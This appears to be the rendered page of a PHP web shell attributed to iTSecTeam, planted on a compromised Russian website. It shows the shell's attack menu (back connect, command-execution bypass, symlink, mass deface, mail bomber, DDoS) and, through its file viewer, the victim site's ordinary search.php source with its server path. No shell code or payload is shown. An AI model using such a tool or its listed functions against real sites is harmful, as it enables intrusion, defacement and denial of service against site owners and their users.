Home -- File Manager -- Command Execute -- Back Connect -- BypasS Command eXecute(SF-DF) -- Symlink -- BypasS Directory -- Eval Php -- Data Base -- Convert -- Mail Boomber Server Information -- Dos Local Server -- Backup Database -- Mass Deface -- Download Remote File -- DDoS -- Find Writable Directory -- Server -- Remove Me -- About
File Name : /home/z/zoomsite/lik-msk.ru/public_html/search.php<?php require_once("./config.php"); require_once("./classes/main.php"); require_once("./classes/search.php"); $mobj = new Main; $sobj = new Search; $arr_stat = $mobj -> selectQuery("*", "static_data", "id=1"); $arr = $mobj -> selectQuery("*", "parts", "id=65"); if($arr["parent_id"] == 0) { $h1_title = $arr["title"]; if($arr["bfolder"] != "" && $arr["bpic"] != "" && file_exists("./img/rubric_images/big/".$arr["bfolder"]."/".$arr["bpic"])) $header_pic = " style=\"background: URL(./img/rubric_images/big/".$arr["bfolder"]."/".$arr["bpic"].") 50% 50% no-repeat;\" "; } else { if($id != 2 && $id != 3) { $arr_root = $mobj -> selectQuery("*", "parts", "id=".$id); $h1_title = $arr_root["title"]; if($arr["bfolder"] != "" && $arr["bpic"] != "" && file_exists("./img/rubric_images/big/".$arr["bfolder"]."/".$arr["bpic"])) $header_pic = " style=\"background: URL(./img/rubric_images/big/".$arr["bfolder"]."/".$arr["bpic"].") 50% 50% no-repeat;\" "; else $header_pic = " style=\"background: URL(./img/rubric_images/big/".$arr_root["bfolder"]."/".$arr_root["bpic"].") 50% 50% no-repeat;\" "; } else { $h1_title = $arr["title"]; if($arr["bfolder"] != "" && $arr["bpic"] != "" && file_exists("./img/rubric_images/big/".$arr["bfolder"]."/".$arr["bpic"])) $header_pic = " style=\"background: URL(./img/rubric_images/big/".$arr["bfolder"]."/".$arr["bpic"].") 50% 50% no-repeat;\" "; if($id == 2 && $step == 4) { $arr_par = $mobj -> selectQuery("*", "parts", "id=".$arr["parent_id"]); if($arr_par["bfolder"] != "" && $arr_par["bpic"] != "" && file_exists("./img/rubric_images/big/".$arr_par["bfolder"]."/".$arr_par["bpic"])) $header_pic = " style=\"background: URL(./img/rubric_images/big/".$arr_par["bfolder"]."/".$arr_par["bpic"].") 50% 50% no-repeat;\" "; } } } $cur_rub = $arr["id"]; $par_rub = $arr["parent_id"]; if($_GET["page"] == "") $_GET["page"] = 1; $_GET["page"] = intval($_GET["page"]); ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="<?php echo($CONST_PATH); ?>"> <title><?php if($arr["pagetitle"] != "") echo($arr["pagetitle"]); else echo($arr["title"]); ?></title> <meta name="keywords" content="<?php echo($arr["keyword"]); ?>" /> <meta name="description" content="<?php echo($arr["description"]); ?>" /> <meta http-equiv="Content-Type" content="text/html; charset=windows-1251" /> <meta name="SKYPE_TOOLBAR" content="SKYPE_TOOLBAR_PARSER_COMPATIBLE" /> <link rel="icon" href="./favicon.ico" type="image/x-icon" /> <meta name="format-detection" content="telephone=no"> <link rel="shortcut icon" href="./favicon.ico" type="image/x-icon" /> <link href="./css/style.css" rel="stylesheet" type="text/css" /> <link href="./css/selectbox.css" rel="stylesheet" type="text/css" /> <link rel="stylesheet" type="text/css" href="./fancybox/jquery.fancybox-1.3.4.css" media="screen" /> <script type="text/javascript" src="./js/jquery-1.7.2.min.js"></script> <script type="text/javascript" src="./js/jquery.corner.js"></script> <script type="text/javascript" src="./js/jquery.selectbox.min.js"></script> <script type="text/javascript" src="./js/script.js"></script> <script type="text/javascript" src="./js/flash.js"></script> <script type="text/javascript" src="./fancybox/jquery.mousewheel-3.0.4.pack.js"></script> <script type="text/javascript" src="./fancybox/jquery.fancybox-1.3.4.pack.js"></script> <script type="text/javascript"> (function($) { $(function() { $('select').selectbox(); }) })(jQuery) $(document).ready(function(){ $(".universedescdiv table tr:even").addClass("even"); $(".universedescdiv table tr:even").mouseover(function() { $(this).removeClass("even"); $(this).addClass("sel"); }); $(".universedescdiv table tr:even").mouseout(function() { $(this).removeClass("sel"); $(this).addClass("even"); }); $(".universedescdiv table tr:odd").mouseover(function() { $(this).addClass("sel"); }); $(".universedescdiv table tr:odd").mouseout(function() { $(this).removeClass("sel"); }); }); function nullAll() { initWin(); $("a.example2-1").fancybox({ 'transitionIn' : 'none', 'transitionOut' : 'none', 'titlePosition' : 'over' }); } </script> </head> <body onLoad="nullAll();"> <div id="overlay"></div> <div class="container"> <?php require_once("./templates/header.php"); ?> <?php require_once("./templates/main-menu.php"); ?> <div class="blocktitle" <?php echo($header_pic); ?> > <div class="titlemar"></div> <div class="titlebg"><h1><?php echo($arr["title"]); ?></h1></div> </div> <div class="clear"></div> <div class="searchdiv"> <div class="searchdivbody"> <div class="searchleft"> <?php $sobj -> searchRubrics($_GET["page"], 10); ?> </div> <div class="clear"></div> </div> <div class="clear"></div> </div> <div class="clear"></div> <div class="psevdofooter"></div> </div> <?php require_once("./templates/footer.php"); ?> </body> </html>
Coded by Amin Shokohi (Pejvak)iTSecTeam.com